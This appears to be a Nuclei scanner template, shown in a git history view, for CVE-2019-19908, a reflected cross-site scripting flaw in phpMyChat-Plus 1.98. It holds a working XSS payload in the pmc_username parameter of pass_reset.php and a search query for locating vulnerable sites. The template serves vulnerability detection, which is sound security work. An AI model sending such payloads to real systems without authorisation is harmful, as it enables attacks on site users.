nuclei-templates/http/cves/2019/CVE-2019-19908.yaml

50 lines
1.3 KiB
YAML
Raw Normal View History

2021-01-02 04:59:06 +00:00
id: CVE-2019-19908
2020-04-08 13:04:46 +00:00
info:
name: phpMyChat-Plus 1.98 - Cross-Site Scripting
2020-04-08 13:04:46 +00:00
author: madrobot
2020-05-25 07:49:06 +00:00
severity: medium
2022-10-26 07:02:34 +00:00
description: |
phpMyChat-Plus 1.98 contains a cross-site scripting vulnerability via pmc_username parameter of pass_reset.php in password reset URL.
reference:
- https://cinzinga.github.io/CVE-2019-19908/
- http://ciprianmp.com/
- https://sourceforge.net/projects/phpmychat/
- https://nvd.nist.gov/vuln/detail/CVE-2019-19908
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-19908
cwe-id: CWE-79
epss-score: 0.00622
2023-07-11 19:49:27 +00:00
cpe: cpe:2.3:a:ciprianmp:phpmychat-plus:1.98:*:*:*:*:*:*:*
2023-08-31 11:46:18 +00:00
epss-percentile: 0.76214
2022-10-26 07:02:34 +00:00
metadata:
max-request: 1
2022-10-26 07:02:34 +00:00
verified: true
google-query: inurl:"/plus/pass_reset.php"
2023-07-11 19:49:27 +00:00
vendor: ciprianmp
product: phpmychat-plus
2022-10-26 07:02:34 +00:00
tags: cve,cve2019,phpMyChat,xss
2020-04-08 13:04:46 +00:00
http:
2020-04-08 13:04:46 +00:00
- method: GET
path:
2022-10-26 07:02:34 +00:00
- "{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C"
matchers-condition: and
2020-04-08 13:04:46 +00:00
matchers:
2022-10-26 07:02:34 +00:00
- type: word
part: body
words:
- 'username = "</script><script>alert(document.domain)</script>'
- type: word
part: header
words:
- text/html
2020-04-08 13:04:46 +00:00
- type: status
status:
2020-05-25 07:49:06 +00:00
- 200